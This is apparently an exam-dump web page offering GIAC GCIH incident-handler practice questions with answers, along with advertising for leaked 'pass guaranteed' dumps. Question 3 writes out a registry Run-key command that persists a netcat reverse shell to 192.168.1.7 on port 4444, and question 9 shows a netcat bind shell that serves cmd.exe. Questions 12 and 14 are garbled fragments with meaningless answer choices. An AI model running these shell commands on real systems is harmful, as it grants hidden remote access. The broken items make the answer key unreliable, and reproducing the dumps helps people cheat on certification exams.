GCIH | How Many Questions Of GCIH Actual Test

Cause all that matters here is passing the GIAC GCIH exam. Cause all that you need is a high score of GCIH GIAC Certified Incident Handler exam. The only one thing you need to do is downloading Passleader GCIH exam study guides now. We will not let you down with our money-back guarantee.

Online GCIH free questions and answers of New Version:

NEW QUESTION 1
CORRECT TEXT
Fill in the blank with the appropriate name of the attack.
______ takes best advantage of an existing authenticated connection

  • A.

Answer: sessionhijacking

NEW QUESTION 2
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.

  • A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3 errors.
  • B. Move the WebStore1 server to the internal network.
  • C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
  • D. Move the computer account of WebStore1 to the Remote organizational unit (OU).

Answer: AC

NEW QUESTION 3
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want to set the Netcat to execute command any time.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.

Answer: BCD

NEW QUESTION 4
Which of the following statements about threats are true?
Each correct answer represents a complete solution. Choose all that apply.

  • A. A threat is a weakness or lack of safeguard that can be exploited by vulnerability, thus causing harm to the information systems or networks.
  • B. A threat is a potential for violation of security which exists when there is a circumstance, capability, action, or event that could breach security and cause harm.
  • C. A threat is a sequence of circumstances and events that allows a human or other agent to cause an information-related misfortune by exploiting vulnerability in an IT product.
  • D. A threat is any circumstance or event with the potential of causing harm to a system in the form of destruction, disclosure, modification of data, or denial of service.

Answer: BCD

NEW QUESTION 5
CORRECT TEXT
Fill in the blank with the appropriate term.
_______is the practice of monitoring and potentially restricting the flow of information outbound from one network to another

  • A.

Answer: Egressfiltering

NEW QUESTION 6
You want to create an SSH tunnel for POP and SMTP protocols. Which of the following commands will you run?

  • A. ssh -L 110:mailhost:110 -L 25
  • B. ssh -L 110:mailhost:110 -L 25:mailhost:25 -1
  • C. ssh -L 25:mailhost:110 -L 110
  • D. ssh -L 110:mailhost:110 -L 25:mailhost:25 -1 user -N mailhost

Answer: D

NEW QUESTION 7
Which of the following tools will you use to prevent from session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. OpenSSH
  • B. Rlogin
  • C. Telnet
  • D. SSL

Answer: AD

NEW QUESTION 8
Which of the following statements is true about a Trojan engine?

  • A. It limits the system resource usage.
  • B. It specifies the signatures that keep a watch for a host or a network sending multiple packets to a single host or a single network.
  • C. It specifies events that occur in a related manner within a sliding time interval.
  • D. It analyzes the nonstandard protocols, such as TFN2K and BO2K.

Answer: D

NEW QUESTION 9
You execute the following netcat command:
c:\target\nc -1 -p 53 -d -e cmd.exe
What action do you want to perform by issuing the above command?

  • A. Listen the incoming data and performing port scanning
  • B. Capture data on port 53 and performing banner grabbing
  • C. Capture data on port 53 and delete the remote shell
  • D. Listen the incoming traffic on port 53 and execute the remote shell

Answer: D

NEW QUESTION 10
Which of the following attacks involves multiple compromised systems to attack a single target?

  • A. Brute force attack
  • B. Replay attack
  • C. Dictionary attack
  • D. DDoS attack

Answer: D

NEW QUESTION 11
Which of the following types of attacks is targeting a Web server with multiple compromised computers that are simultaneously sending hundreds of FIN packets with spoofed IP source IP addresses?

  • A. Evasion attack
  • B. Insertion attack
  • C. DDoS attack
  • D. Dictionary attack

Answer: C

NEW QUESTION 12
203 ms 22.670 ms 20.111 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms


Solution:


Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 13
Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?

  • A. Dash (-)
  • B. Double quote (")
  • C. Single quote (')
  • D. Semi colon (;)

Answer: C

NEW QUESTION 14
Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.


Solution:


Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 15
CORRECT TEXT
Fill in the blank with the appropriate term.
______ is a technique used to make sure that incoming packets are actually from the networks that they claim to be from.

  • A.

Answer: Ingressfiltering

NEW QUESTION 16
Rick works as a Computer Forensic Investigator for BlueWells Inc. He has been informed that some confidential information is being leaked out by an employee of the company. Rick suspects that someone is sending the information through email. He checks the emails sent by some employees to other networks. Rick finds out that Sam, an employee of the Sales department, is continuously sending text files that contain special symbols, graphics, and signs. Rick suspects that Sam is using the Steganography technique to send data in a disguised form. Which of the following techniques is Sam using?
Each correct answer represents a part of the solution. Choose all that apply.

  • A. Linguistic steganography
  • B. Perceptual masking
  • C. Technical steganography
  • D. Text Semagrams

Answer: AD

NEW QUESTION 17
Which of the following is used to gather information about a remote network protected by a firewall?

  • A. Warchalking
  • B. Wardialing
  • C. Firechalking
  • D. Firewalking

Answer: D

NEW QUESTION 18
......

P.S. Dumpscollection.com now are offering 100% pass ensure GCIH dumps! All GCIH exam questions have been updated with correct answers: https://www.dumpscollection.net/dumps/GCIH/ (328 New Questions)